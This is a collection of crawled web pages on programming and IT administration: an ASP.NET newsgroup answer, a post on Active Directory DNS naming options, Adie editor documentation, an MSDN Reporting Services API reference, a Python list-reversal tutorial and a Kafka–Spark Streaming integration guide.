programming; Objects are made from >> classes, and classes provide encapsulation. Object-oriented >> programming can get pretty darned complex, and encapsulation can save >> you a lot of grief, by hiding those things which need hiding from >> those things that don't need them. >> >> If you have a file with a bunch of Subs and Functions in it, you need >> to create a class with Subs and Functions in it. These Subs and >> Functions can be Shared (meaning that they are singleton objects that >> don't require a class instance to operate), or they can be Instance >> (meaning that an instance of the class containing them must be created >> in order to use them). The advantage to Shared data and process is >> that it doesn't require a class instance, and is, in essence "global," >> available to the entire application. This is also the disadvantage of >> Shared data and process. Anything can get to it, and change it, and in >> a multi-threaded app (unlike VB 6, .net is multi-threaded), this can >> cause all sorts of problems. Unless you're familiar with the issues, I >> would stick with classes that require instantiation. Instantiation is >> the process of creating a copy (instance) of a class that is limited >> in its scope (availability), and is thread-safe. >> >> Once you create an instance of a class, you can access any Public or >> Friend (Friend is more protected than Public, but you shouldn't run >> into issues right away) members from any other class that references >> the instance. >> >> From your question, and the code you posted, I can see that you >> require a good bit more education and practice. I would recommend the >> .Net SDK, a free download from: >> >> >> -4070-9F41-A333C6B9181D&displaylang=en >> >> It is extremely important to know the difference between ASP and >> ASP.Net, between VBScript or VB 6, and VB.Net. The first are >> procedural, single-threaded, and easy to use for small applications. >> .Net is object-oriented, multi-threaded, and easy to use once you >> spend a great deal of time studying it, but incredibly hard to use if >> you don't. >> >> Kevin Spencer >> Microsoft MVP >> .Net Developer >> Everybody picks their nose, >> But some people are better at hiding it. >> "bienwell" <bienwell@xxxxxxxxxxx> wrote in message >> news:O7QlcGdnFHA.1480@xxxxxxxxxxxxxxxxxxxxxxx >> >>> Hi, >>> >>> I have a question about file included in ASP.NET. I have a file >>> that includes all the Sub functions (e.g FileFunct.vb). One of the >>> functions in this file is : >>> >>> Sub TestFunct(ByVal strInput As String) >>> return (strInput & " test") >>> End Sub >>> I'd like to call this function in FileFunct.vb from another .ASPX >>> file like this : >>> >>> <%@ import Namespace="System" %> >>> <%@ import Namespace="System.Data" %> >>> <html> >>> <head> >>> <title>Test page</title> >>> </head> >>> <body> >>> <script runat="server" language="VB" scr="FileFunct.vb" > >>> Sub Page_Load(s As Object, e As EventArgs) >>> Dim result=TestFunct("This is a string") >>> response.write("<BR>result ==> " & result) >>> End Sub >>> </script> >>> </body> >>> </html> >>> I've got this error: >>> >>> Server Error in '/' Application. >>> --------------------------------------------------------------------- >>> ------- ---- >>> >>> Compilation Error >>> Description: An error occurred during the compilation of a resource >>> required >>> to service this request. Please review the following specific error >>> details >>> and modify your source code appropriately. >>> Compiler Error Message: BC30451: Name 'TestFunct' is not declared. >>> >>> Source Error: >>> >>> Line 18: Sub Page_Load(s As Object, e As EventArgs) >>> Line 19: >>> Line 20: Dim result=TestFunct("This is a string") >>> Line 21: response.write("<BR>Result ==> " & Result) >>> Line 22: >>> I have a single .ASPX file and I don't use Visual studio. NET in this >>> case. >>> Can I do that ? >>> Thanks in advance. >>> > > . - References: - Re: How to call a Sub function from .ASPX file ? - From: Kevin Spencer - Re: How to call a Sub function from .ASPX file ? - From: tom pester - Prev by Date: MSDN Subscriber Downloads: which version of VS2005 do I download? - Next by Date: Re: How do I read back autonumber after do an insert in asp.net - Previous by thread: Re: How to call a Sub function from .ASPX file ? - Next by thread: Re: How to call a Sub function from .ASPX file ? - Index(es):
http://www.tech-archive.net/Archive/DotNet/microsoft.public.dotnet.framework.aspnet/2005-08/msg01844.html
crawl-002
en
refinedweb
Re: How to use sub-domain - From: "Todd J Heron" <todd_heron(delete)@hotmail.com> - Date: Sun, 23 Oct 2005 01:07:24 -0400 AD/DNS Namespace Planning - The Standard Three Options with Advantages/Disadvantages Can't decide on domain.com or domain.local for your AD domain? There are three differing views to this classic question and while they ultimately depend upon company preference, much of the direction will be driven by administrator experience. The three basic options outlined below are the most commonly-given answers to the question, and some companies use a combination of these scenarios. When explaining these to a relative beginner, many advanced AD/DNS administrators routinely their reasoning from their responses, but the explanations that follow contain detailed pros and cons of each. Option #1: Same internal and external DNS domain name. The administrator maintains entirely separate DNS implementations (no zone transfers, etc.), where the internal AD/DNS domain has manually configured static records (web, mail, etc..) to get to frequently used IP hosts in the public DNS zone of the same name . Name resolution trap: If one is not careful, setting the internal AD domain to the same name as the external (public) DNS domain name will have the following consequences for internal AD users if their client machine's DNS settings are pointing to the external namespace DNS servers: Inability to access the public website, slow network logons, no group policy updates. 2. Administrative overhead: Any changes made to the public DNS zone (such as the addition or removal of an important IP host such as a web server, mail server, or VPN server) must also be changed manually in the internal AD/DNS zone if internal users will be accessing these hosts from inside the network perimeter (a common circumstance). 3. VPN resolution: scenario: --------------------------------------------------------------------------------------- Option #2: Delegated subdomain. This is subdomain of the public DNS zone. For example, externaldnsdomain.com and subdomain.externaldnsname.com. Advantages: 1. Security: Like Option #1, this method also isolates the internal company network (please note that this is also a disadvantage due to a longer DNS namespace (see note under 'Disadvantages' below). 2. Administration: DNS records for the public DNS zone do not need to be manually duplicated into the internal AD/DNS zone. 3. DNS resolution: Internal company (Active Directory) clients can resolve external resources in the public DNS zone easily, once proper DNS name resolution mechanisms such as forwarding, secondary zones, or delegation zones are set up. 4. VPN resolution: VPN clients accessing the internal company network from the Internet can easily navigate into the internal subdomain. It is very reliable as long as the VPN stays connected. Disadvantages: 1. Longer DNS namespace: This may not look appealing (or "pretty") to the end-users. 2. Security: While there is security in an isolated subdomain, there is a potential for exposure to outside attack, albeit extremely limited.. Hackers could use this information to gather information about your network. To the extent, however, that internal networks are only accessible to the outside world via VPN (and/or exists within a non-Internet routable IP range) then this scenario is not a security disadvantage. The scenario. For the internal domain, you can use any extension you want, such as .ad, int, .lan, etc... This option is usually best for beginners because it's the easiest to implement - primarily because it prevents name space conflicts from the very beginning with the public domain and requires no further action. But this option does make VPN resolution difficult (like Option #1) and, Exchange message headers will show the company internal AD name which looks unprofessional. Advantages: 1. Easy setup. This method is the easiest to setup. DNS namespace collisions are avoided from the beginning. The internal AD domain will never conflict with any public domain. Disadvantages: 1. Non-FQDN resolution. Internet Explorer and simply types "server1" in the address bar (as often happens), then which "server1" is really the correct answer? The answer may not be what the user was looking for, and it will be based off of the configuration settings of the following: DNS settings under the client's TCP/IP properties, the DNS suffix search order, WINS forwarding, domain membership, and whether or not it is using a proxy server. 2. VPN resolution. VPN clients may encounter problems when trying to access internal resources. Newer VPN clients, such as those offered by Cisco and Nortel, once connected, provide name resolution by passing internal name servers (WINS, DNS) to the TCP/IP stack. If the VPN client cannot do this, add the host names of important internal hosts to the internal (WINS, DNS) name servers so that the VPN client will be able to resolve these names. Otherwise, you will need to use a Hosts (and Lmhosts if necessary) file, which is both manually intensive and will need to be updated whenever one of the listed IP host changes it's name or changes it's IP address, which happens often in an enterprise environment. For a broad overview of this entire topic, visit: DNS Namespace Planning;en-us;254680 Assigning the Forest Root Domain Name Conclusion: All three approaches will have to take both security and end-user experience into perspective. This perspective is colored by company size, budget, and experience of personnel running Active Directory and the network infrastructure (mostly with respect to DNS and VPN). No single approach should be considered the best solution under all circumstances. For any host name that you wish to be able to access from both your internal network and the Internet, you need Option #1, although it is the most administratively intensive over time. If you do not select this option and go with Option #2 or #3 only, then consideration will have to be given to the fact that company end-users will need to be trained on using different names under different circumstances based on where they are - at work, at home or on the road. -- Todd J Heron, MCSE Windows Server 2003/2000/NT; CCA ---------------------------------------------------------------------------- This posting is provided "as is" with no warranties and confers no rights <jonathanm@xxxxxxxxxxx> wrote in message news:1129862550.011564.32240@xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx I saw this post on this group: In my opinion best choice would be to take a sub-zone of your registered domain name (e.g. you have registered domain name company.us. For internal use make a sub-zone e.g. named ad.company.us or lan.company.us or loca.company.us ...). Try to avoid name company.local or similar.... While it goes against common convention for Server 03, it does appeal to me for various reasons including the support of Macs on my network. Can someone explain how this works? Do I need to contact my ISP or domain registrar? Details please! Regards, MDJ . - References: - How to use sub-domain - From: jonathanm - Prev by Date: Re: Office 2000 stopped working after 4 days - Next by Date: Re: Windows server account always gets locked - repost - Previous by thread: How to use sub-domain - Next by thread: RE: VPN DNS setup for default DNS server - Index(es):
http://www.tech-archive.net/Archive/Windows/microsoft.public.windows.server.general/2005-10/msg00677.html
crawl-002
en
refinedweb
You can quickly navigate to the desired file by typing the first few letters of the filename and then pressing Enter (Return); use Backspace to move up one directory level. Control-H moves to your home directory, Control-W moves back to the current working directory. A nice convenience of the File Dialog is the ability to set bookmarks, so once bookmarked, you can quickly move back to a previously visited directory. #include "filname.h" or: #include. Adie can also take advantage of a wheel mouse; simply point the mouse inside the text area and use the wheel to scroll it up and down. Holding the Control-key while operating the wheel makes the scrolling go faster, by smoothly scrolling one page at a time. To scroll horizontally, simply point the mouse at the horizontal scroll bar. In fact, any scrollable control (including the File/Directory Browser), can be scrolled by simply pointing the cursor over it and using the mouse wheel. You can adjust the number of lines scrolled for each wheel notch by means of the Preferences dialog. You can change font by invoking the Font Selection Dialog from the Font menu. The Font Dialog displays four list boxes showing the font Family, Weight, Style, and Size of each font. You can narrow down the number of fonts displayed by selecting a specific character set, setwidth, pitch, and whether or not scalable fonts are to be listed only. The All Fonts checkbutton causes all fonts to be listed. Use this feature if you need to select old-style X11 bitmap fonts. The Preview window shows a sample of text in the selected font. The colors subpane allows you to change the colors used in the File/Directory browser, and the Text Window. You can simply drag colors from one color well to another, or you can double-click on a color well and bring up the Color Dialog. The Color Dialog offers a number of ways to create a new color, either by selecting one of the pre-defined color wells, by mixing a custom color in RGB, HSV, or CMYK color space, or by selecting a named color from a list. The active text line, i.e. the line containing the cursor, can be drawn using a special style when the Active background button is checked. If Line Numbers are displayed, the line numbers and line numbers background can also be modified. The editor subpane is used to change various modes of the editor: patternname (patternlist) Where patternname is the name of the pattern (e.g. "C Source") and the patternlist is a comma separated list of patterns (for example "*.h,*.c"). The patternname is optional. Some examples from my own setup of Adie (you can paste these from this help window if you want) are shown below: All Files (*) All Source (*.cpp,*.cxx,*.cc,*.C,*.c,*.hpp,*.hxx,*.hh,*.H,*.h,*.y,*.l) C++ Source Files (*.cpp,*.cxx,*.cc,*.c,*.C) C++ Header Files (*.h,*.hpp,*.hxx,*.hh,*.H) C Source Files (*.c) C Header Files (*.h) Python Files (*.py) Perl Files (*.pl) Ruby Files (*.rb) Lex (*.l) Yacc (*.y) Object (*.o) X Pixmap (*.xpm) X Bitmap (*.xbm) Some details on the allowable wild-card patterns: The syntax file contains a number of Language-blocks; each language block contains a number of syntax rules. Each rule may also contain a subrule. The order of the rules inside a Language-block is important; during matching, the first rule is tried first, then the second, and so on. With subrules, its the same way. The formal syntax for the syntax file (sic!) is as follows: SYNTAXFILE : { LANGUAGEBLOCK } ; LANGUAGEBLOCK : language STRING { DECLARATION } { RULE } end ; DECLARATION : filesmatch STRING | contentsmatch STRING | delimiters STRING | contextlines NUMBER | contextchars NUMBER ; RULE : rule STRING { PATTERN } { RULE } end ; PATTERN : pattern STRING | openpattern STRING | closepattern STRING | stoppattern STRING ; STRING : "text" ; NUMBER : digits ; In a string, a quote (") can be embedded by prefixing with an backslash (\). Each statement must be on a single line. A hash (#) sign is used to introduce a comment, which extends to the end of the line. To determine which language block to use for coloring, Adie first examines the wildcards in the filesmatch string. If the filename loaded into the editor matches the list of wildcards, the language block will be used for syntax coloring. Some files don't have any file extensions. In that case, you can instead determine which language block to use by matching the first fragment of the file (typically 512 characters) to the contentsmatch regular expression. Note that the order of the language blocks is important; earlier language blocks will be tried first. The delimiters expression holds the list of characters used as delimiters when editing files of this syntax. When the editor matches patterns for syntax incremental syntax coloring, it needs a certain amount of context around the change being made to the text. Typically, the contextchars should be set to the length of the largest pattern to be matched. The contextlines should be set to the number of lines of context. If these statements are omitted, Adie assumes the context to be one line of text. This is good in most cases. Syntax rules are named patterns. The name of the rule is used to look up the corresponding colors in the FOX registry (so make sure the names are legal registry key names!). Thus, the colors can be easily configurable. Rules may be either simple rules or complex rules. Simple rules match a single regular expression pattern and have no subrules. Complex rules have a openpattern and a closepattern, and possibly a stoppattern. Complex rules may have any number of subrules. The matching process is recursive, depth-first. That means, when matching complex rules, first the open pattern is matched, then all of the subrules, followed by the close pattern and stop pattern [if specified]. This allows for easy to create subpatterns e.g. backslash-escape codes [see example]. The patterns are specified using the perl-like regular expressions also used for search and replace, see above. As an example, here is a somewhat simplified version of the C++ language patterns: language "C++" # File patterns for this language mode filesmatch "*.C,*.cpp,*.cc,*.cxx,*.c++,*.H,*.hpp,*.hh,*.h++,*.h" # Word delimiters delimiters "~.,/\`'!@#$%^&*()-=+{}|[]\":;<>?" # C++ style comment rule "CPPComment" openpattern "//" # Start of C++ comment closepattern "$" # Goes to end of line end # C style comment rule "CComment" openpattern "/\*" # Note the '\' does not have to be escaped unless followed by " closepattern "\*/" # CComment pattern is potentially expensive as it can go till end of buffer! end # String rule "String" openpattern "\"" # Opening quotes closepattern "\"" # Closing quotes stoppattern "$" # Don't scan past end of line! rule "OctalEscape" # Octal character can have more than 1 character; pattern "\\d+" # that's why this rule MUST come before "ControlEscape"! end rule "ControlEscape" # Allow an escape; subrules are matched first pattern "\\." # so a escaped closing quote is not seen by the "String" rule end end # Char constant rule "Char" openpattern "'" closepattern "'" rule "OctalEscape" pattern "\\d+" end rule "ControlEscape" pattern "\\." end end # Preprocessor rule "Preprocessor" openpattern "^\s*#" closepattern "$" rule "PreprocessorContinuation" pattern "\\n" end end rule "Keyword" pattern "\<(friend|typename|explicit|typeid|for|while|if|and_so_on)\>" end rule "Number" pattern "\<((0[xX][0-9a-fA-F]+)|((\d+\.?\d*)|(\.\d+))([eE](\+|-)?\d+)?)\>" end rule "Type" pattern "\<(unsigned|signed|int|char|short|long|float|double)\>" end rule "Operator" pattern "(\+\+|\+=|\+|--|-=|->\*|->|-|==|=|&&)" end end [SETTINGS] typingspeed=800 clickspeed=400 scrollspeed=80 scrolldelay=600 blinkspeed=500 animspeed=10 menupause=400 tippause=800 tiptime=3000 dragdelta=6 wheellines=1 bordercolor=black basecolor=AntiqueWhite3 hilitecolor=AntiqueWhite shadowcolor=AntiqueWhite4 backcolor=AntiqueWhite1 forecolor=black selforecolor=AntiqueWhite selbackcolor=#aea395 tipforecolor=yellow tipbackcolor=black normalfont="[lucidatypewriter] 90 700 1 1 0 1" iconpath = /usr/share/icons:/home/jeroen/icons These settings can be either placed in $HOME/.foxrc (and thus affect all FOX programs), or in $HOME/.foxrc/FoxTest/Adie (only applying to Adie). File types may be bound to a command, mime-type, and icons using statements like the one below: [FILETYPES] cpp = "/usr/local/bin/textedit %s &;C++ Source File;c_src.xpm;mini/c_src.xpm" /home/jeroen = ";Home Directory;home.xpm;mini/home.xpm;application/x-folder" defaultfilebinding = "/usr/local/bin/textedit %s &;Document;document.xpm;mini/document.xpm" defaultexecbinding = ";Application;exec.xpm;mini/exec.xpm;application/x-executable-file" defaultdirbinding = ";Folder;folder.xpm;mini/folder.xpm;application/x-folder"This example shows how the extension ".cpp" is bound to the program "textedit" and is associated with two icons, a big icon "c_src.xpm" and a small icon "mini/c_src.xpm", which are to be found in the directories determined by 'iconpath", in this case, "/usr/share/icons" or "/home/jeroen/icons". It also binds two icons "home.xpm" and "mini/home.xpm" to the home directory "/home/jeroen". Finally, it assigns icons, commands, and mime-types to unbound documents, executables, and directories, overriding the built-in icons of the FOX Toolkit.
http://fox-toolkit.org/adie.html
crawl-002
en
refinedweb
Public Function ListChildren ( _ Item As String, _ Recursive As Boolean _ ) As CatalogItem() public CatalogItem[] ListChildren ( string Item, bool Recursive ) public: array<CatalogItem^>^ ListChildren ( String^ Item, bool Recursive ) public CatalogItem[] ListChildren ( String Item, boolean Recursive ) public function ListChildren ( Item : String, Recursive : boolean ) : CatalogItem[] The full path name of the parent folder. A Boolean expression that indicates whether to return the entire tree of child items below the specified item. The default value is false. The ListChildren method returns only child items that the user has permission to view. The items that are returned may not represent a complete list of child items of the specified parent item. If the ListChildren ListChildren is called on the root. The ListChildren2005() using System; using System.IO; using System.Text; using System.Web.Services.Protocols; using System.Xml; using System.Xml.Serialization; class Sample { public static void Main() { ReportingService2005 rs = new ReportingService2005();); } } }
http://technet.microsoft.com/en-us/library/microsoft.wssux.reportingserviceswebservice.rsmanagementservice2005.reportingservice2005.listchildren.aspx
crawl-002
en
refinedweb
List or array manipulation questions are quite common in coding interviews. One type of manipulation you may be asked to perform is a reversal of the list: in other words, putting the list in reverse order. In Python, we actually have a built in method which takes care of reversing a list, so your first step should definitely be to ask if you can make use of the built in reverse method. base = [1, 2, 3, 4, 5] base.reverse() Even if your interviewer says, "no", you've at least demonstrated that you know this method exists. So, let's imagine the interviewer says they want to see a custom solution. How do we approach this question. Talking Through the Problem A big part of interview questions like this is reasoning your way through the problem. What do we have to achieve? What are the steps we'll take to achieve that goal? How do we verify that the solution works? Let's start by making this into a concrete problem, rather than something abstract. If we have the following list: numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9] What we want, is for it to end up like this: numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1] One perfectly valid way we might want to go about this is to remove items from the beginning of the list and tack them onto the end, until we've repeated this process as many times as items exist in the list. Another option might be to take the items from the end and repeatedly add these final items to a new list. In the list above we have 9 items, and we can figure out the length using len, which means we can use the list length as a termination condition for a loop. Python also has a method called pop which both removes an item from a list and returns it. This is clearly very handy for our situation, because we want to use this value again, probably as part of an append method. By default, pop removes the final item in a list, so we won't need to provide any arguments. Each time we get a value returned from pop, we know it's the current final value of the list, so if we repeatedly append these final values to a new list, we should should end up with a list in reverse order. Using our concrete example, the first value returned by pop would be 9, so this would be the first value we append. The next pop value we append would be 8, and so on and so forth, until we reach 1, which is the final value added to our new list. Writing the Code Now that we've talked about the solution, the actual code isn't too challenging. We can create a new empty list called reversed_list, but we should also create a copy of the base list so that we can check against it later. Remember that pop will consume values from the original_list, so when we're finished, it will be empty. For the actual loop, we're going to keep track of the length of the original_list, which, as I just mentioned, will get consumed as we repeatedly call pop on it. We'll keep repeating the loop until there are no more items to pop. For each iteration, we get a new item returned by pop and store it in a final_item variable, which we then use an an argument to the append method we call on reversed_list. base = [1, 2, 3, 4, 5] original_list = list(base) reversed_list = [] while len(original_list) > 0: final_item = original_list.pop() reversed_list.append(final_item) Feel free to test it yourself, but this solution should work perfectly fine. If you prefer, you can make a little shorter by removing the assignment to final_item, putting the pop method directly inside the append method. base = [1, 2, 3, 4, 5] original_list = list(base) reversed_list = [] while len(original_list) > 0: reversed_list.append(original_list.pop()) The result works exactly the same, but you may find this less readable. Using Black Magic Our solution above is perfectly fine, but there are some fancy tricks you can use to solve this problem as well. One solution is using slices like so: original_list = [1, 2, 3, 4, 5] reversed_list = original_list[::-1] This is a really cool solution. It's incredibly short, and it doesn't consume our original list. The problem is, this syntax tells you absolutely nothing about what it does if you don't know about slicing. Luckily our variables have names which make everything incredibly explicit, but this isn't always the case. Please don't ever use this in your actual code, at least not for lists. There is generally no excuse for using this over just using reverse. However, this trick is really useful for strings, or tuples, where you don't have nice built in methods for reversing order. If you want to learn more about how awesome slices are, take a look at our previous posts on this topic: Part 1, Part 2. Using Sorted There's also another one-liner solution available to us using sorted, but again, I don't recommend ever using it in the wild. One benefit that sorted has over something like the slice syntax is that it at least makes a lot of sense conceptually. We're just sorting the list into reverse order. base = [1, 2, 3, 4, 5] original_list = list(base) reversed_list = sorted(original_list, key=lambda x: base.index(x), reverse=True) Unfortunately, the implementation isn't quite that straightforward. We have to use a lambda function in order to let sorted know we want to sort based on index, rather than the values themselves. Overall, I don't think this is a good solution to the problem. Our while loop is of comparable length, and is far easier to read and understand. We could take that solution to even a Python beginner and they could figure it out relatively easily. That's not the case here. Update: One of our readers pointed out something I'd completely overlooked in this article: lists with duplicate elements. Because the index method finds the index of the first instance of a given value, the solution using sorted will become unreliable for lists with duplicate elements. Thanks, Mark! Testing Our Solutions Throughout I've made sure to preserve the original list items in their original order, because this means we can test whether our solutions work. Now we just have to figure out how we do this. Some useful things to know about lists Lists are ordered by index, so we can talk about the content of our list by referring to an item at a given index. Given the lists we had in the beginning: numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9] numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1] In the numbers list the item at index 0 is an integer object with the value 1, while in numbers_reversed the item at index 0 is an integer object with the value 9. We can also refer to items in a list using negative indices, where -1 refers to the last item in the sequence, -2 is the penultimate item, and -3 is the antepenultimate item, etc. For a list of length n, the first item can be accessed by using either a reference to index 0 or -n. There's also a relationship between an item's current index, and its index if the list were reversed. Knowing this will let us programmatically check the results of our list reversal. For an item at a given negative index, its new positive index will be absolute value of the negative index (how far it is from zero) - 1. For an item at a given positive index, it's new negative index will be its current positive index plus 1, all multiplied by negative 1. Written in code, these relationships look like this. Imagine we want to check whether the index 2 (i.e. number 3 inside the list) is in the correct place once the list has been reversed: numbers = [1, 2, 3, 4, 5, 6, 7, 8, 9] numbers_reversed = [9, 8, 7, 6, 5, 4, 3, 2, 1] index_to_check = 2 negative_index = (index_to_check + 1) * -1 # -3 correct = numbers[index_to_check] == numbers_reversed[negative_index] print(correct) # True Creating a Test Function Using this information, we can write the following function to check everything ended up where it was supposed to go: def check_reversal(original_list, reversed_list): for index, item in enumerate(original_list): negative = (index + 1) * -1 if reversed_list[negative] != item: print(f"Element {item} was not located at the expected index") break else: print("List reversed successfully") We take in two lists as arguments, though it actually doesn't matter which order we pass them in: the reverse of the reversed list is the original list after all, so our checks should work regardless of order. We take the first list and call enumerate to grab the item and index at the same time. We convert the current positive index to the negative index we expect for the item in the reversed list and assign this values to new_neg. We perform a check to ensure the item ended up in the correct place in the new list, and break the loop if we find a misplaced item, printing a message in the console at the same time. If the loop runs to completion, the else block executes, letting us know that the list was reversed successfully. If you're not familiar with this for / else syntax, we have a short Python Snippet post on this topic, but you can also find more information in the official docs. Read our introduction to unit testing post to see how we would write tests for our list reversal function. Wrapping up Thank you for reading. I hope you've learnt something in this post! Got any questions? Tweet at us. Consider joining our Complete Python Course for more Python goodness, or check out our Automated Software Testing with Python course for a deeper focus on testing Python and web applications.
https://blog.tecladocode.com/coding-interview-problems-reversing-a-list-python/
CC-MAIN-2019-47
en
refinedweb
A VideoTrack that is played at a constant rate. More... #include <video_decoder.h> List of all members. A VideoTrack that is played at a constant rate. If the frame count is unknown, you must override endOfTrack(). Definition at line 655 of file video_decoder.h. [inline] Definition at line 657 of file video_decoder.h. [inline, virtual] Definition at line 658 of file video_decoder.h. [virtual] Get the duration of the track (starting from this track's start time). By default, this returns 0 for unknown. Reimplemented from Video::VideoDecoder::Track. Definition at line 591 of file video_decoder.cpp. Get the frame that should be displaying at the given time. This is helpful for someone implementing seek(). Definition at line 578 of file video_decoder.cpp. [protected, pure virtual] Get the rate at which this track is played. Implemented in Video::AVIDecoder::AVIVideoTrack. Get the time the given frame should be shown. By default, this returns a negative (invalid) value. This function should only be used by VideoDecoder::seekToFrame(). Reimplemented from Video::VideoDecoder::VideoTrack. Definition at line 563 of file video_decoder.cpp. Get the start time of the next frame in milliseconds since the start of the video. Implements Video::VideoDecoder::VideoTrack. Definition at line 556 of file video_decoder.cpp.
https://doxygen.residualvm.org/d3/de4/classVideo_1_1VideoDecoder_1_1FixedRateVideoTrack.html
CC-MAIN-2019-47
en
refinedweb
How and Why: Static Queries in Gatsby Themes Static Queries are now supported in Gatsby Themes thanks to Dustin. Static Queries are useful in normal Gatsby applications to add data like the site’s title, a link to a github repo, or any other site metadata defined in gatsby-config.js to the site. import React from "react";import { StaticQuery, graphql } from "gatsby";const Header = ({ data }) => (<header><h1>{data.site.siteMetadata.title}</h1></header>);export default props => (<StaticQueryquery={graphql`query {site {siteMetadata {title}}}`}render={data => <Header data={data} {...props} />}/>); Enabling Users In themes, Static Queries can take advantage of Component Shadowing to build up a navigation data structure and let the user override the appearance of the navigation without having to worry about how to fetch and calculate a tree from a list of Markdown. import React from "react";import { StaticQuery, graphql } from "gatsby";import SideNav from "./src/components/side-nav";export default props => (<StaticQueryquery={graphql`query {allMarkdownRemark {edges {node {slugfrontmatter {title}}}}}`}render={data => {const navItems = data.allMarkdownRemark.reduce((acc, cur) => {// calculate nav item nested tree here});return <SideNav items={navItems} {...props} />;}}/>); Since we’ve put the SideNav in gatsby-theme-my-theme/src/components we’ve opted in to letting it be shadowed by a user of our theme. We’ve also enabled our user to not have to worry about figuring out what the proper algorithm is for creating the navigation elements in the proper data structure, which can be hard or time consuming depending on how complex it is. A user can create a file at src/components/gatsby-theme-my-theme/side-nav.js in their site and purely worry about rendering the object they are given as a prop in their new SideNav component. Since Static Queries are only run once we aren’t adding any extra network calls on each page load to build up this navigation structure. Site Metadata Static Queries in themes are also useful in the original example, to pull in site metadata. The difference is that since siteMetadata is merged between themes and the user’s site (since gatsby-config.js is merged), a user can override the content returned in the query by setting a field in the siteMetadata object in their site. This can be their name in an author field, a GitHub URL to their project to construct an “edit this page on GitHub” Link component, or anything else you can think of. // uses Static Query internally for base URL from siteMetadata// and location.pathname for doc location per-page<GitHubEditLink /> Fin Static Queries are useful in regular applications and they can also be used to empower users when built into themes and theme components.
https://www.christopherbiscardi.com/post/how-and-why-static-queries-in-gatsby-themes/
CC-MAIN-2019-47
en
refinedweb
Apache Kafka + Spark Streaming Integration 1. Objective In order to build real-time applications, Apache Kafka – Spark Streaming Integration are the best combinations. So, in this article, we will learn the whole concept of Spark Streaming Integration in Kafka in detail. Moreover, we will look at Spark Streaming-Kafka example. After this, we will discuss a receiver-based approach and a direct approach to Kafka Spark Streaming Integration. Also, we will look advantages of direct approach to receiver-based approach in Kafka Spark Streaming Integration. So, let’s start Kafka Spark Streaming Integration How good are you in Kafka 2. What is Kafka Spark Streaming Integration? approaches, such as performance characteristics and semantics guarantees. Let’s study both approaches in detail. a. Receiver-Based Approach Here, we use a Receiver to receive the data. So, by using the Kafka high-level consumer API, we implement the Receiver. Further, the received data is stored in Spark executors. Then jobs launched by Kafka – Spark Streaming processes the data. Although, it is a possibility that this approach can lose data under failures under default configuration. Hence, we have to additionally enable write-ahead logs in Kafka Spark Streaming, to ensure zero-data-loss. That saves all the received Kafka data into write-ahead logs on a distributed file system synchronously. In this way, it is possible to recover all the data on failure. Apache Kafka Workflow | Kafka Pub-Sub Messaging Further, we will discuss how to use this Receiver-Based Approach in our Kafka Spark Streaming application. i. Linking Now, link your Kafka streaming application with the following artifact, for Scala/Java applications using SBT/Maven project definitions. groupId = org.apache.spark artifactId = spark-streaming-kafka-0-8_2.11 version = 2.2.0 However, we will have to add this above library and its dependencies when deploying our application, for Python applications. ii. Programming Afterward, create an input DStream by importing KafkaUtils, in the streaming application code: import org.apache.spark.streaming.kafka._ val kafkaStream = KafkaUtils.createStream(streamingContext, [ZK quorum], [consumer group id], [per-topic number of Kafka partitions to consume]) Also, using variations of createStream, we can specify the key and value classes and their corresponding decoder classes. iii. Deploying As with any Spark applications, spark-submit is used to launch your application. However, the details are slightly different for Scala/Java applications and Python applications. Read about Spark use cases in detail Moreover, using –packages spark-streaming-Kafka-0-8_2.11 and its dependencies can be directly added to spark-submit, for Python applications, which lack SBT/Maven project management. ./bin/spark-submit --packages org.apache.spark:spark-streaming-kafka-0-8_2.11:2.2.0 ... Also, we can also download the JAR of the Maven artifact spark-streaming-Kafka-0-8-assembly from the Maven repository. Then add it to spark-submit with –jars. b. Direct Approach (No Receivers) After Receiver-Based Approach, new receiver-less “direct” approach has been introduced. It ensures stronger end-to-end guarantees. This approach periodically queries Kafka for the latest offsets in each topic+partition, rather than using receivers to receive data. Also, defines the offset ranges to process in each batch, accordingly. Moreover, to read the defined ranges of offsets from Kafka, it’s simple consumer API is used, especially when the jobs to process the data are launched. However, it is similar to read files from a file system. Note: This feature was introduced in Spark 1.3 for the Scala and Java API, in Spark 1.4 for the Python API. Now, let’s discuss how to use this approach in our streaming application. To learn more about Consumer API follow the below link: Apache Kafka Consumer | Examples of Kafka Consumer i. Linking However, this approach is supported only in Scala/Java application. With the following artifact, link the SBT/Maven project. groupId = org.apache.spark artifactId = spark-streaming-kafka-0-8_2.11 version = 2.2.0 ii. Programming Further, import KafkaUtils and create an input DStream, in the streaming application code: import org.apache.spark.streaming.kafka._ val directKafkaStream = KafkaUtils.createDirectStream[ [key class], [value class], [key decoder class], [value decoder class] ]( streamingContext, [map of Kafka parameters], [set of topics to consume]) We must specify either metadata.broker.list or bootstrap.servers, in the Kafka parameters. Hence, it will start consuming from the latest offset of each Kafka partition, by default. Although, it will start consuming from the smallest offset if you set configuration auto.offset.reset in Kafka parameters to smallest. Moreover, using other variations of KafkaUtils.createDirectStream we can start consuming from an arbitrary offset. Afterward, do the following to access the Kafka offsets consumed in each batch. // Hold a reference to the current offset ranges, so downstream can use it var offsetRanges = Array.empty}") } ... } If we want Zookeeper-based Kafka monitoring tools to show the progress of the streaming application, we can use this to update Zookeeper ourself. Read Top 5 Apache Kafka Books | Complete Guide To Learn Kafka iii. Deploying Here, deploying process is similar to deploying process of Receiver-Based Approach. 3. Advantages of Direct Approach There are following advantages of 2nd approach over 1st approach in Spark Streaming Integration with Kafka: a. Simplified Parallelism There is no requirement to create multiple input Kafka streams and union them. However, Kafka – Spark Streaming will create as many RDD partitions as there are Kafka partitions to consume, with the direct stream. That will read data from Kafka in parallel. Hence, we can say, it is a one-to-one mapping between Kafka and RDD partitions, which is easier to understand and tune. b.. The second approach eliminates the problem as there is no receiver, and hence no need for write-ahead logs. As long as we have sufficient Kafka retention, it is possible to recover messages from Kafka. c. Exactly-Once Semantics Basically, we used Kafka’s high-level API to store consumed offsets in Zookeeper in the first approach. However, to consume data from Kafka this is a traditional way. Even if it can ensure zero data loss, there is a small chance some records may get consumed twice under some failures. It happens due to inconsistencies between data reliably received by Kafka – Spark Streaming and offsets tracked by Zookeeper. Therefore, we use a simple Kafka API that does not use Zookeeper, in this second approach. 